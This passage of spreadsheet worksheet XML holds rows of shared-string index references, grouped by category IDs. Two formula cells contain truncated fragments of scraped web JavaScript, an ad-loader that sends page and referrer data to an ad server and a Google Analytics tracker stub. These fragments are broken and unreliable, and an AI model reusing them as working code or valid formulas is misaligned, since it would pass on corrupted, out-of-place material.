      <c r="A1635" t="s">
        <v>37</v>
      </c>
      <c r="B1635" t="s">
        <v>1238</v>
      </c>
    </row>
    <row r="1636" spans="1:2">
      <c r="A1636" t="s">
        <v>37</v>
      </c>
      <c r="B1636" t="s">
        <v>1239</v>
      </c>
    </row>
    <row r="1637" spans="1:2">
      <c r="A1637" t="s">
        <v>37</v>
      </c>
      <c r="B1637" t="s">
        <v>1240</v>
      </c>
    </row>
    <row r="1638" spans="1:2">
      <c r="A1638" t="s">
        <v>37</v>
      </c>
      <c r="B1638" t="s">
        <v>1241</v>
      </c>
    </row>
    <row r="1639" spans="1:2">
      <c r="A1639" t="s">
        <v>37</v>
      </c>
      <c r="B1639" t="s">
        <v>1242</v>
      </c>
    </row>
    <row r="1640" spans="1:2">
      <c r="A1640" t="s">
        <v>37</v>
      </c>
      <c r="B1640" t="s">
        <v>1243</v>
      </c>
    </row>
    <row r="1641" spans="1:2">
      <c r="A1641" t="s">
        <v>37</v>
      </c>
      <c r="B1641" t="s">
        <v>1244</v>
      </c>
    </row>
    <row r="1642" spans="1:2">
      <c r="A1642" t="s">
        <v>37</v>
      </c>
      <c r="B1642" t="s">
        <v>1245</v>
      </c>
    </row>
    <row r="1643" spans="1:2">
      <c r="A1643" t="s">
        <v>37</v>
      </c>
      <c r="B1643" t="s">
        <v>1246</v>
      </c>
    </row>
    <row r="1644" spans="1:2">
      <c r="A1644" t="s">
        <v>37</v>
      </c>
      <c r="B1644" t="s">
        <v>1247</v>
      </c>
    </row>
    <row r="1645" spans="1:2">
      <c r="A1645" t="s">
        <v>38</v>
      </c>
      <c r="B1645" t="s">
        <v>1248</v>
      </c>
    </row>
    <row r="1646" spans="1:2">
      <c r="A1646" t="s">
        <v>38</v>
      </c>
      <c r="B1646" t="s">
        <v>1249</v>
      </c>
    </row>
    <row r="1647" spans="1:2">
      <c r="A1647" t="s">
        <v>38</v>
      </c>
      <c r="B1647" t="s">
        <v>1250</v>
      </c>
    </row>
    <row r="1648" spans="1:2">
      <c r="A1648" t="s">
        <v>38</v>
      </c>
      <c r="B1648" t="s">
        <v>1251</v>
      </c>
    </row>
    <row r="1649" spans="1:2">
      <c r="A1649" t="s">
        <v>38</v>
      </c>
      <c r="B1649" t="s">
        <v>1252</v>
      </c>
    </row>
    <row r="1650" spans="1:2">
      <c r="A1650" t="s">
        <v>38</v>
      </c>
      <c r="B1650" t="s">
        <v>1253</v>
      </c>
    </row>
    <row r="1651" spans="1:2">
      <c r="A1651" t="s">
        <v>38</v>
      </c>
      <c r="B1651" t="s">
        <v>1254</v>
      </c>
    </row>
    <row r="1652" spans="1:2">
      <c r="A1652" t="s">
        <v>38</v>
      </c>
      <c r="B1652" t="s">
        <v>1255</v>
      </c>
    </row>
    <row r="1653" spans="1:2">
      <c r="A1653" t="s">
        <v>38</v>
      </c>
      <c r="B1653" t="s">
        <v>1256</v>
      </c>
    </row>
    <row r="1654" spans="1:2">
      <c r="A1654" t="s">
        <v>38</v>
      </c>
      <c r="B1654" t="s">
        <v>1257</v>
      </c>
    </row>
    <row r="1655" spans="1:2">
      <c r="A1655" t="s">
        <v>38</v>
      </c>
      <c r="B1655" t="s">
        <v>1258</v>
      </c>
    </row>
    <row r="1656" spans="1:2">
      <c r="A1656" t="s">
        <v>38</v>
      </c>
      <c r="B1656" t="s">
        <v>1259</v>
      </c>
    </row>
    <row r="1657" spans="1:2">
      <c r="A1657" t="s">
        <v>39</v>
      </c>
      <c r="B1657" t="s">
        <v>1260</v>
      </c>
    </row>
    <row r="1658" spans="1:2">
      <c r="A1658" t="s">
        <v>39</v>
      </c>
      <c r="B1658" t="s">
        <v>1261</v>
      </c>
    </row>
    <row r="1659" spans="1:2">
      <c r="A1659" t="s">
        <v>39</v>
      </c>
      <c r="B1659" t="s">
        <v>1262</v>
      </c>
    </row>
    <row r="1660" spans="1:2">
      <c r="A1660" t="s">
        <v>39</v>
      </c>
      <c r="B1660" t="s">
        <v>261</v>
      </c>
    </row>
    <row r="1661" spans="1:2">
      <c r="A1661" t="s">
        <v>39</v>
      </c>
      <c r="B1661" t="s">
        <v>262</v>
      </c>
    </row>
    <row r="1662" spans="1:2">
      <c r="A1662" t="s">
        <v>39</v>
      </c>
      <c r="B1662" t="s">
        <v>263</v>
      </c>
    </row>
    <row r="1663" spans="1:2">
      <c r="A1663" t="s">
        <v>39</v>
      </c>
      <c r="B1663" t="s">
        <v>1263</v>
      </c>
    </row>
    <row r="1664" spans="1:2">
      <c r="A1664" t="s">
        <v>39</v>
      </c>
      <c r="B1664" t="s">
        <v>265</v>
      </c>
    </row>
    <row r="1665" spans="1:2">
      <c r="A1665" t="s">
        <v>39</v>
      </c>
      <c r="B1665" t="s">
        <v>266</v>
      </c>
    </row>
    <row r="1666" spans="1:2">
      <c r="A1666" t="s">
        <v>39</v>
      </c>
      <c r="B1666" t="s">
        <v>267</v>
      </c>
    </row>
    <row r="1667" spans="1:2">
      <c r="A1667" t="s">
        <v>39</v>
      </c>
      <c r="B1667" t="s">
        <v>268</v>
      </c>
    </row>
    <row r="1668" spans="1:2">
      <c r="A1668" t="s">
        <v>39</v>
      </c>
      <c r="B1668" t="s">
        <v>269</v>
      </c>
    </row>
    <row r="1669" spans="1:2">
      <c r="A1669" t="s">
        <v>39</v>
      </c>
      <c r="B1669" t="s">
        <v>270</v>
      </c>
    </row>
    <row r="1670" spans="1:2">
      <c r="A1670" t="s">
        <v>39</v>
      </c>
      <c r="B1670" t="s">
        <v>271</v>
      </c>
    </row>
    <row r="1671" spans="1:2">
      <c r="A1671" t="s">
        <v>39</v>
      </c>
      <c r="B1671" t="s">
        <v>272</v>
      </c>
    </row>
    <row r="1672" spans="1:2">
      <c r="A1672" t="s">
        <v>39</v>
      </c>
      <c r="B1672" t="s">
        <v>273</v>
      </c>
    </row>
    <row r="1673" spans="1:2">
      <c r="A1673" t="s">
        <v>39</v>
      </c>
      <c r="B1673" t="s">
        <v>274</v>
      </c>
    </row>
    <row r="1674" spans="1:2">
      <c r="A1674" t="s">
        <v>39</v>
      </c>
      <c r="B1674" t="s">
        <v>275</v>
      </c>
    </row>
    <row r="1675" spans="1:2">
      <c r="A1675" t="s">
        <v>39</v>
      </c>
      <c r="B1675" t="s">
        <v>276</v>
      </c>
    </row>
    <row r="1676" spans="1:2">
      <c r="A1676" t="s">
        <v>39</v>
      </c>
      <c r="B1676" t="s">
        <v>277</v>
      </c>
    </row>
    <row r="1677" spans="1:2">
      <c r="A1677" t="s">
        <v>39</v>
      </c>
      <c r="B1677" t="s">
        <v>278</v>
      </c>
    </row>
    <row r="1678" spans="1:2">
      <c r="A1678" t="s">
        <v>39</v>
      </c>
      <c r="B1678" t="s">
        <v>279</v>
      </c>
    </row>
    <row r="1679" spans="1:2">
      <c r="A1679" t="s">
        <v>39</v>
      </c>
      <c r="B1679" t="s">
        <v>280</v>
      </c>
    </row>
    <row r="1680" spans="1:2">
      <c r="A1680" t="s">
        <v>39</v>
      </c>
      <c r="B1680" t="s">
        <v>1264</v>
      </c>
    </row>
    <row r="1681" spans="1:2">
      <c r="A1681" t="s">
        <v>39</v>
      </c>
      <c r="B1681" t="s">
        <v>1265</v>
      </c>
    </row>
    <row r="1682" spans="1:2">
      <c r="A1682" t="s">
        <v>39</v>
      </c>
      <c r="B1682" t="s">
        <v>1266</v>
      </c>
    </row>
    <row r="1683" spans="1:2">
      <c r="A1683" t="s">
        <v>39</v>
      </c>
      <c r="B1683" t="s">
        <v>1267</v>
      </c>
    </row>
    <row r="1684" spans="1:2">
      <c r="A1684" t="s">
        <v>39</v>
      </c>
      <c r="B1684" t="s">
        <v>1268</v>
      </c>
    </row>
    <row r="1685" spans="1:2">
      <c r="A1685" t="s">
        <v>39</v>
      </c>
      <c r="B1685" t="s">
        <v>1269</v>
      </c>
    </row>
    <row r="1686" spans="1:2">
      <c r="A1686" t="s">
        <v>39</v>
      </c>
      <c r="B1686" t="s">
        <v>1270</v>
      </c>
    </row>
    <row r="1687" spans="1:2">
      <c r="A1687" t="s">
        <v>39</v>
      </c>
      <c r="B1687" t="s">
        <v>1271</v>
      </c>
    </row>
    <row r="1688" spans="1:2">
      <c r="A1688" t="s">
        <v>39</v>
      </c>
      <c r="B1688" t="s">
        <v>1272</v>
      </c>
    </row>
    <row r="1689" spans="1:2">
      <c r="A1689" t="s">
        <v>39</v>
      </c>
      <c r="B1689" t="s">
        <v>1273</v>
      </c>
    </row>
    <row r="1690" spans="1:2">
      <c r="A1690" t="s">
        <v>39</v>
      </c>
      <c r="B1690" t="s">
        <v>1274</v>
      </c>
    </row>
    <row r="1691" spans="1:2">
      <c r="A1691" t="s">
        <v>39</v>
      </c>
      <c r="B1691" t="s">
        <v>1275</v>
      </c>
    </row>
    <row r="1692" spans="1:2">
      <c r="A1692" t="s">
        <v>39</v>
      </c>
      <c r="B1692" t="s">
        <v>1276</v>
      </c>
    </row>
    <row r="1693" spans="1:2">
      <c r="A1693" t="s">
        <v>39</v>
      </c>
      <c r="B1693" t="s">
        <v>1277</v>
      </c>
    </row>
    <row r="1694" spans="1:2">
      <c r="A1694" t="s">
        <v>39</v>
      </c>
      <c r="B1694">
        <f>a[e],q=typeof f;"object"==q&amp;&amp;null!=f||"function"==q?d.push(r(f,b+e+c)):null!==f&amp;&amp;void 0!==f&amp;&amp;(e=encodeURIComponent(b+e),d.push(e+"="+encodeURIComponent(f)))});return d.filter(p).join("&amp;")}function t(a,b){a||((window.__ATA||{}).config=b.c,m(b.url))}var u=Math.floor(1E13*Math.random()),v=window.__ATA||{};window.__ATA=v;window.__ATA.cmd=v.cmd||[];v.rid=u;v.createdAt=g();var w=window.__ATA||{},x="s.pubmine.com";
		w&amp;&amp;w.serverDomain&amp;&amp;(x=w.serverDomain);var y="//"+x+"/conf",z=window.top===window,A=window.__ATA_PP&amp;&amp;window.__ATA_PP.gdpr_applies,B="boolean"===typeof A?Number(A):null,C=window.__ATA_PP||null,D=z?document.referrer?document.referrer:null:null,E=z?window.location.href:document.referrer?document.referrer:null,F,G=n("__ATA_tuuid");F=G?G:null;var H=window.innerWidth+"x"+window.innerHeight,I=n("usprivacy"),J=r({gdpr:B,pp:C,rid:u,src:D,ref:E,tuuid:F,vp:H,us_privacy:I?I:null},"",".");
		(function(a){var b=void 0===b?"cb":b;l++;var c="callback__"+g().toString(36)+"_"+l.toString(36);a=k(a,b,c);window[c]=function(d){t(void 0,d)};m(a,function(d){d&amp;&amp;t(d)})})(y+"?"+J);}).call(this);
		&lt;/script&gt;	&lt;script&gt;
		var sas_fallback = sas_fallback || [];
		sas_fallback.push(
			{ tag: "&amp;lt;div id=&amp;quot;atatags-26942-643735feef87d&amp;quot;&amp;gt;&amp;lt;/div&amp;gt;&amp;lt;script&amp;gt;__ATA.cmd.push(function() {__ATA.initDynamicSlot({id: \'atatags-26942-643735feef87d\',location: 120,formFactor: \'001\',label: {text: \'Advertisements\',},creative: {reportAd: {text: \'Report this ad\',},privacySettings: {text: \'Privacy\',}}});});&amp;lt;/script&amp;gt;", }
		);
	&lt;/script&gt;		&lt;script type="text/javascript"&gt;
			wind</f>
        <v>0</v>
      </c>
    </row>
    <row r="1695" spans="1:2">
      <c r="A1695" t="s">
        <v>40</v>
      </c>
      <c r="B1695" t="s">
        <v>1278</v>
      </c>
    </row>
    <row r="1696" spans="1:2">
      <c r="A1696" t="s">
        <v>40</v>
      </c>
      <c r="B1696" t="s">
        <v>1279</v>
      </c>
    </row>
    <row r="1697" spans="1:2">
      <c r="A1697" t="s">
        <v>40</v>
      </c>
      <c r="B1697" t="s">
        <v>1280</v>
      </c>
    </row>
    <row r="1698" spans="1:2">
      <c r="A1698" t="s">
        <v>40</v>
      </c>
      <c r="B1698" t="s">
        <v>1281</v>
      </c>
    </row>
    <row r="1699" spans="1:2">
      <c r="A1699" t="s">
        <v>40</v>
      </c>
      <c r="B1699" t="s">
        <v>1282</v>
      </c>
    </row>
    <row r="1700" spans="1:2">
      <c r="A1700" t="s">
        <v>40</v>
      </c>
      <c r="B1700" t="s">
        <v>1283</v>
      </c>
    </row>
    <row r="1701" spans="1:2">
      <c r="A1701" t="s">
        <v>40</v>
      </c>
      <c r="B1701" t="s">
        <v>1284</v>
      </c>
    </row>
    <row r="1702" spans="1:2">
      <c r="A1702" t="s">
        <v>40</v>
      </c>
      <c r="B1702" t="s">
        <v>1285</v>
      </c>
    </row>
    <row r="1703" spans="1:2">
      <c r="A1703" t="s">
        <v>40</v>
      </c>
      <c r="B1703" t="s">
        <v>1286</v>
      </c>
    </row>
    <row r="1704" spans="1:2">
      <c r="A1704" t="s">
        <v>40</v>
      </c>
      <c r="B1704" t="s">
        <v>1287</v>
      </c>
    </row>
    <row r="1705" spans="1:2">
      <c r="A1705" t="s">
        <v>40</v>
      </c>
      <c r="B1705" t="s">
        <v>1288</v>
      </c>
    </row>
    <row r="1706" spans="1:2">
      <c r="A1706" t="s">
        <v>40</v>
      </c>
      <c r="B1706" t="s">
        <v>1289</v>
      </c>
    </row>
    <row r="1707" spans="1:2">
      <c r="A1707" t="s">
        <v>40</v>
      </c>
      <c r="B1707" t="s">
        <v>1290</v>
      </c>
    </row>
    <row r="1708" spans="1:2">
      <c r="A1708" t="s">
        <v>40</v>
      </c>
      <c r="B1708" t="s">
        <v>1291</v>
      </c>
    </row>
    <row r="1709" spans="1:2">
      <c r="A1709" t="s">
        <v>40</v>
      </c>
      <c r="B1709" t="s">
        <v>1292</v>
      </c>
    </row>
    <row r="1710" spans="1:2">
      <c r="A1710" t="s">
        <v>40</v>
      </c>
      <c r="B1710" t="s">
        <v>1293</v>
      </c>
    </row>
    <row r="1711" spans="1:2">
      <c r="A1711" t="s">
        <v>40</v>
      </c>
      <c r="B1711" t="s">
        <v>1294</v>
      </c>
    </row>
    <row r="1712" spans="1:2">
      <c r="A1712" t="s">
        <v>40</v>
      </c>
      <c r="B1712" t="s">
        <v>1295</v>
      </c>
    </row>
    <row r="1713" spans="1:2">
      <c r="A1713" t="s">
        <v>40</v>
      </c>
      <c r="B1713" t="s">
        <v>1278</v>
      </c>
    </row>
    <row r="1714" spans="1:2">
      <c r="A1714" t="s">
        <v>40</v>
      </c>
      <c r="B1714" t="s">
        <v>1296</v>
      </c>
    </row>
    <row r="1715" spans="1:2">
      <c r="A1715" t="s">
        <v>40</v>
      </c>
      <c r="B1715" t="s">
        <v>1297</v>
      </c>
    </row>
    <row r="1716" spans="1:2">
      <c r="A1716" t="s">
        <v>40</v>
      </c>
      <c r="B1716" t="s">
        <v>1298</v>
      </c>
    </row>
    <row r="1717" spans="1:2">
      <c r="A1717" t="s">
        <v>40</v>
      </c>
      <c r="B1717" t="s">
        <v>1299</v>
      </c>
    </row>
    <row r="1718" spans="1:2">
      <c r="A1718" t="s">
        <v>40</v>
      </c>
      <c r="B1718" t="s">
        <v>1300</v>
      </c>
    </row>
    <row r="1719" spans="1:2">
      <c r="A1719" t="s">
        <v>40</v>
      </c>
      <c r="B1719" t="s">
        <v>1301</v>
      </c>
    </row>
    <row r="1720" spans="1:2">
      <c r="A1720" t="s">
        <v>40</v>
      </c>
      <c r="B1720" t="s">
        <v>1302</v>
      </c>
    </row>
    <row r="1721" spans="1:2">
      <c r="A1721" t="s">
        <v>40</v>
      </c>
      <c r="B1721" t="s">
        <v>1303</v>
      </c>
    </row>
    <row r="1722" spans="1:2">
      <c r="A1722" t="s">
        <v>40</v>
      </c>
      <c r="B1722" t="s">
        <v>1304</v>
      </c>
    </row>
    <row r="1723" spans="1:2">
      <c r="A1723" t="s">
        <v>40</v>
      </c>
      <c r="B1723" t="s">
        <v>1305</v>
      </c>
    </row>
    <row r="1724" spans="1:2">
      <c r="A1724" t="s">
        <v>40</v>
      </c>
      <c r="B1724" t="s">
        <v>1306</v>
      </c>
    </row>
    <row r="1725" spans="1:2">
      <c r="A1725" t="s">
        <v>40</v>
      </c>
      <c r="B1725" t="s">
        <v>1307</v>
      </c>
    </row>
    <row r="1726" spans="1:2">
      <c r="A1726" t="s">
        <v>40</v>
      </c>
      <c r="B1726" t="s">
        <v>1308</v>
      </c>
    </row>
    <row r="1727" spans="1:2">
      <c r="A1727" t="s">
        <v>40</v>
      </c>
      <c r="B1727" t="s">
        <v>1309</v>
      </c>
    </row>
    <row r="1728" spans="1:2">
      <c r="A1728" t="s">
        <v>40</v>
      </c>
      <c r="B1728" t="s">
        <v>1310</v>
      </c>
    </row>
    <row r="1729" spans="1:2">
      <c r="A1729" t="s">
        <v>40</v>
      </c>
      <c r="B1729" t="s">
        <v>1311</v>
      </c>
    </row>
    <row r="1730" spans="1:2">
      <c r="A1730" t="s">
        <v>40</v>
      </c>
      <c r="B1730" t="s">
        <v>1278</v>
      </c>
    </row>
    <row r="1731" spans="1:2">
      <c r="A1731" t="s">
        <v>40</v>
      </c>
      <c r="B1731" t="s">
        <v>1312</v>
      </c>
    </row>
    <row r="1732" spans="1:2">
      <c r="A1732" t="s">
        <v>40</v>
      </c>
      <c r="B1732" t="s">
        <v>1297</v>
      </c>
    </row>
    <row r="1733" spans="1:2">
      <c r="A1733" t="s">
        <v>40</v>
      </c>
      <c r="B1733" t="s">
        <v>1298</v>
      </c>
    </row>
    <row r="1734" spans="1:2">
      <c r="A1734" t="s">
        <v>40</v>
      </c>
      <c r="B1734" t="s">
        <v>1299</v>
      </c>
    </row>
    <row r="1735" spans="1:2">
      <c r="A1735" t="s">
        <v>40</v>
      </c>
      <c r="B1735" t="s">
        <v>1300</v>
      </c>
    </row>
    <row r="1736" spans="1:2">
      <c r="A1736" t="s">
        <v>40</v>
      </c>
      <c r="B1736" t="s">
        <v>1301</v>
      </c>
    </row>
    <row r="1737" spans="1:2">
      <c r="A1737" t="s">
        <v>40</v>
      </c>
      <c r="B1737" t="s">
        <v>1302</v>
      </c>
    </row>
    <row r="1738" spans="1:2">
      <c r="A1738" t="s">
        <v>40</v>
      </c>
      <c r="B1738" t="s">
        <v>1303</v>
      </c>
    </row>
    <row r="1739" spans="1:2">
      <c r="A1739" t="s">
        <v>40</v>
      </c>
      <c r="B1739" t="s">
        <v>1304</v>
      </c>
    </row>
    <row r="1740" spans="1:2">
      <c r="A1740" t="s">
        <v>40</v>
      </c>
      <c r="B1740" t="s">
        <v>1305</v>
      </c>
    </row>
    <row r="1741" spans="1:2">
      <c r="A1741" t="s">
        <v>40</v>
      </c>
      <c r="B1741" t="s">
        <v>1306</v>
      </c>
    </row>
    <row r="1742" spans="1:2">
      <c r="A1742" t="s">
        <v>40</v>
      </c>
      <c r="B1742" t="s">
        <v>1307</v>
      </c>
    </row>
    <row r="1743" spans="1:2">
      <c r="A1743" t="s">
        <v>40</v>
      </c>
      <c r="B1743" t="s">
        <v>1308</v>
      </c>
    </row>
    <row r="1744" spans="1:2">
      <c r="A1744" t="s">
        <v>40</v>
      </c>
      <c r="B1744" t="s">
        <v>1309</v>
      </c>
    </row>
    <row r="1745" spans="1:2">
      <c r="A1745" t="s">
        <v>40</v>
      </c>
      <c r="B1745" t="s">
        <v>1310</v>
      </c>
    </row>
    <row r="1746" spans="1:2">
      <c r="A1746" t="s">
        <v>40</v>
      </c>
      <c r="B1746" t="s">
        <v>1311</v>
      </c>
    </row>
    <row r="1747" spans="1:2">
      <c r="A1747" t="s">
        <v>41</v>
      </c>
      <c r="B1747" t="s">
        <v>1313</v>
      </c>
    </row>
    <row r="1748" spans="1:2">
      <c r="A1748" t="s">
        <v>41</v>
      </c>
      <c r="B1748" t="s">
        <v>1314</v>
      </c>
    </row>
    <row r="1749" spans="1:2">
      <c r="A1749" t="s">
        <v>41</v>
      </c>
      <c r="B1749" t="s">
        <v>1315</v>
      </c>
    </row>
    <row r="1750" spans="1:2">
      <c r="A1750" t="s">
        <v>41</v>
      </c>
      <c r="B1750" t="s">
        <v>1316</v>
      </c>
    </row>
    <row r="1751" spans="1:2">
      <c r="A1751" t="s">
        <v>41</v>
      </c>
      <c r="B1751" t="s">
        <v>1314</v>
      </c>
    </row>
    <row r="1752" spans="1:2">
      <c r="A1752" t="s">
        <v>41</v>
      </c>
      <c r="B1752" t="s">
        <v>1315</v>
      </c>
    </row>
    <row r="1753" spans="1:2">
      <c r="A1753" t="s">
        <v>41</v>
      </c>
      <c r="B1753" t="s">
        <v>1317</v>
      </c>
    </row>
    <row r="1754" spans="1:2">
      <c r="A1754" t="s">
        <v>41</v>
      </c>
      <c r="B1754" t="s">
        <v>1314</v>
      </c>
    </row>
    <row r="1755" spans="1:2">
      <c r="A1755" t="s">
        <v>41</v>
      </c>
      <c r="B1755" t="s">
        <v>1315</v>
      </c>
    </row>
    <row r="1756" spans="1:2">
      <c r="A1756" t="s">
        <v>42</v>
      </c>
      <c r="B1756" t="s">
        <v>1318</v>
      </c>
    </row>
    <row r="1757" spans="1:2">
      <c r="A1757" t="s">
        <v>42</v>
      </c>
      <c r="B1757" t="s">
        <v>1319</v>
      </c>
    </row>
    <row r="1758" spans="1:2">
      <c r="A1758" t="s">
        <v>42</v>
      </c>
      <c r="B1758" t="s">
        <v>1320</v>
      </c>
    </row>
    <row r="1759" spans="1:2">
      <c r="A1759" t="s">
        <v>42</v>
      </c>
      <c r="B1759" t="s">
        <v>1321</v>
      </c>
    </row>
    <row r="1760" spans="1:2">
      <c r="A1760" t="s">
        <v>42</v>
      </c>
      <c r="B1760" t="s">
        <v>1322</v>
      </c>
    </row>
    <row r="1761" spans="1:2">
      <c r="A1761" t="s">
        <v>42</v>
      </c>
      <c r="B1761">
        <f>= 'object' || f === null || typeof f.hitCallback ! == 'function' ) {_x000D_
					console.log( 'Not running function __gaTracker(' + arguments[0] + " ....) because you are not being tracked. "</f>
        <v>0</v>
      </c>
    </row>
    <row r="1762" spans="1:2">
      <c r="A1762" t="s">
        <v>42</v>
      </c>
      <c r="B1762" t="s">
        <v>1323</v>
      </c>
    </row>
    <row r="1763" spans="1:2">
      <c r="A1763" t="s">
        <v>42</v>
      </c>
      <c r="B1763" t="s">
        <v>1324</v>
      </c>
    </row>
    <row r="1764" spans="1:2">
      <c r="A1764" t="s">
        <v>42</v>
      </c>
      <c r="B1764" t="s">
        <v>1325</v>
      </c>
    </row>
    <row r="1765" spans="1:2">
      <c r="A1765" t="s">
        <v>42</v>
      </c>
      <c r="B1765" t="s">
        <v>1326</v>
      </c>
    </row>
    <row r="1766" spans="1:2">
      <c r="A1766" t="s">
        <v>42</v>
      </c>
      <c r="B1766" t="s">
        <v>1327</v>
      </c>
    </row>
    <row r="1767" spans="1:2">
      <c r="A1767" t="s">
        <v>42</v>
      </c>
      <c r="B1767" t="s">
        <v>1328</v>
      </c>
    </row>
    <row r="1768" spans="1:2">
      <c r="A1768" t="s">
        <v>42</v>
      </c>
      <c r="B1768" t="s">
        <v>1329</v>
      </c>
    </row>
    <row r="1769" spans="1:2">
      <c r="A1769" t="s">
        <v>42</v>
      </c>
      <c r="B1769" t="s">
        <v>1330</v>
      </c>
    </row>
    <row r="1770" spans="1:2">
      <c r="A1770" t="s">
        <v>42</v>
      </c>
      <c r="B1770" t="s">
        <v>1331</v>
      </c>
    </row>
    <row r="1771" spans="1:2">
      <c r="A1771" t="s">
        <v>42</v>
      </c>
      <c r="B1771" t="s">
        <v>1332</v>
      </c>
    </row>
    <row r="1772" spans="1:2">
      <c r="A1772" t="s">
        <v>42</v>
      </c>
      <c r="B1772" t="s">
        <v>1333</v>
      </c>
    </row>
    <row r="1773" spans="1:2">
      <c r="A1773" t="s">
        <v>42</v>
      </c>
      <c r="B1773" t="s">
        <v>1334</v>
      </c>
    </row>
    <row r="1774" spans="1:2">
      <c r="A1774" t="s">
        <v>42</v>
      </c>
      <c r="B1774" t="s">
        <v>1335</v>
      </c>
    </row>
    <row r="1775" spans="1:2">
      <c r="A1775" t="s">
        <v>43</v>
      </c>
      <c r="B1775" t="s">
        <v>1336</v>
      </c>
    </row>
    <row r="1776" spans="1:2">
      <c r="A1776" t="s">
        <v>43</v>
      </c>
      <c r="B1776" t="s">
        <v>1337</v>
      </c>
    </row>
    <row r="1777" spans="1:2">
      <c r="A1777" t="s">
        <v>43</v>
      </c>
      <c r="B1777" t="s">
        <v>1338</v>
      </c>
    </row>
    <row r="1778" spans="1:2">
      <c r="A1778" t="s">
        <v>43</v>
      </c>
      <c r="B1778" t="s">
        <v>1339</v>
      </c>
    </row>
    <row r="1779" spans="1:2">
      <c r="A1779" t="s">
        <v>43</v>
      </c>
      <c r="B1779" t="s">
        <v>1340</v>
      </c>
    </row>
    <row r="1780" spans="1:2">
      <c r="A1780" t="s">
        <v>43</v>
      </c>
      <c r="B1780" t="s">
        <v>1341</v>
      </c>
    </row>
    <row r="1781" spans="1:2">
      <c r="A1781" t="s">
        <v>43</v>
      </c>
      <c r="B1781" t="s">
        <v>1342</v>
      </c>
    </row>
    <row r="1782" spans="1:2">
      <c r="A1782" t="s">
        <v>43</v>
      </c>
      <c r="B1782" t="s">
        <v>1343</v>
      </c>
    </row>
    <row r="1783" spans="1:2">
      <c r="A1783" t="s">
        <v>43</v>
      </c>
      <c r="B1783" t="s">
        <v>1344</v>
      </c>
    </row>
    <row r="1784" spans="1:2">
      <c r="A1784" t="s">
        <v>43</v>
      </c>
      <c r="B1784" t="s">
        <v>1345</v>
      </c>
    </row>
    <row r="1785" spans="1:2">
      <c r="A1785" t="s">
        <v>43</v>
      </c>
      <c r="B1785" t="s">
        <v>1346</v>
      </c>
    </row>
    <row r="1786" spans="1:2">
      <c r="A1786" t="s">
        <v>43</v>
      </c>
      <c r="B1786" t="s">
        <v>1347</v>
      </c>
    </row>
    <row r="1787" spans="1:2">
      <c r="A1787" t="s">
        <v>43</v>
      </c>
      <c r="B1787" t="s">
        <v>1348</v>
      </c>
    </row>
    <row r="1788" spans="1:2">
      <c r="A1788" t="s">
        <v>43</v>
      </c>
      <c r="B1788" t="s">
        <v>1349</v>
      </c>
    </row>
    <row r="1789" spans="1:2">
      <c r="A1789" t="s">
        <v>43</v>
      </c>
      <c r="B1789" t="s">
        <v>1350</v>
      </c>
    </row>
    <row r="1790" spans="1:2">
      <c r="A1790" t="s">
        <v>43</v>
      </c>
      <c r="B1790" t="s">
        <v>1351</v>
      </c>
    </row>
    <row r="1791" spans="1:2">
      <c r="A1791" t="s">
        <v>43</v>
      </c>
      <c r="B1791" t="s">
        <v>1352</v>
      </c>
    </row>
    <row r="1792" spans="1:2">
      <c r="A1792" t="s">
        <v>43</v>
      </c>
      <c r="B1792" t="s">
        <v>1353</v>
      </c>
    </row>
    <row r="1793" spans="1:2">
      <c r="A1793" t="s">
        <v>43</v>
      </c>
      <c r="B1793" t="s">
        <v>1354</v>
      </c>
    </row>
    <row r="1794" spans="1:2">
      <c r="A1794" t="s">
        <v>43</v>
      </c>
      <c r="B1794" t="s">
        <v>1355</v>
      </c>
    </row>
    <row r="1795" spans="1:2">
      <c r="A1795" t="s">
        <v>43</v>
      </c>
      <c r="B1795" t="s">
        <v>1356</v>
      </c>
    </row>
    <row r="1796" spans="1:2">
      <c r="A1796" t="s">
        <v>43</v>
      </c>
      <c r="B1796" t="s">
        <v>1357</v>
      </c>
    </row>
    <row r="1797" spans="1:2">
      <c r="A1797" t="s">
        <v>43</v>
      </c>
      <c r="B1797" t="s">
        <v>1358</v>
      </c>
    </row>
    <row r="1798" spans="1:2">
      <c r="A1798" t="s">
        <v>43</v>
      </c>
      <c r="B1798" t="s">
        <v>1359</v>
      </c>
    </row>
    <row r="1799" spans="1:2">
      <c r="A1799" t="s">
        <v>43</v>
      </c>
      <c r="B1799" t="s">
        <v>1360</v>
      </c>
    </row>
    <row r="1800" spans="1:2">
      <c r="A1800" t="s">
        <v>43</v>
      </c>
      <c r="B1800" t="s">
        <v>1361</v>
      </c>
    </row>
    <row r="1801" spans="1:2">
      <c r="A1801" t="s">
        <v>43</v>
      </c>
      <c r="B1801" t="s">
        <v>1362</v>
      </c>
    </row>
    <row r="1802" spans="1:2">
      <c r="A1802" t="s">
        <v>43</v>
      </c>
      <c r="B1802" t="s">
        <v>1363</v>
      </c>
    </row>
    <row r="1803" spans="1:2">
      <c r="A1803" t="s">
        <v>43</v>
      </c>
      <c r="B1803" t="s">
        <v>1364</v>
      </c>
    </row>
    <row r="1804" spans="1:2">
      <c r="A1804" t="s">
        <v>43</v>
      </c>
      <c r="B1804" t="s">
        <v>1365</v>
      </c>
    </row>
    <row r="1805" spans="1:2">
      <c r="A1805" t="s">
        <v>43</v>
      </c>
      <c r="B1805" t="s">
        <v>1366</v>
      </c>
    </row>
    <row r="1806" spans="1:2">
      <c r="A1806" t="s">
        <v>43</v>
      </c>
      <c r="B1806" t="s">
        <v>1367</v>
      </c>
    </row>
    <row r="1807" spans="1:2">
      <c r="A1807" t="s">
        <v>43</v>
      </c>
      <c r="B1807" t="s">
        <v>1368</v>
      </c>
    </row>
    <row r="1808" spans="1:2">
      <c r="A1808" t="s">
        <v>43</v>
      </c>
      <c r="B1808" t="s">
        <v>1369</v>
      </c>
    </row>
    <row r="1809" spans="1:2">
      <c r="A1809" t="s">
        <v>43</v>
      </c>
      <c r="B1809" t="s">
        <v>1370</v>
      </c>
    </row>
    <row r="1810" spans="1:2">
      <c r="A1810" t="s">
        <v>44</v>
      </c>
      <c r="B1810" t="s">
        <v>1371</v>
      </c>
    </row>
    <row r="1811" spans="1:2">
      <c r="A1811" t="s">
        <v>44</v>
      </c>
      <c r="B1811" t="s">
        <v>1372</v>
      </c>
    </row>
    <row r="1812" spans="1:2">
      <c r="A1812" t="s">
        <v>44</v>
      </c>
      <c r="B1812" t="s">
        <v>1373</v>
      </c>
    </row>
    <row r="1813" spans="1:2">
      <c r="A1813" t="s">
        <v>44</v>
      </c>
      <c r="B1813" t="s">
        <v>1374</v>
      </c>
    </row>
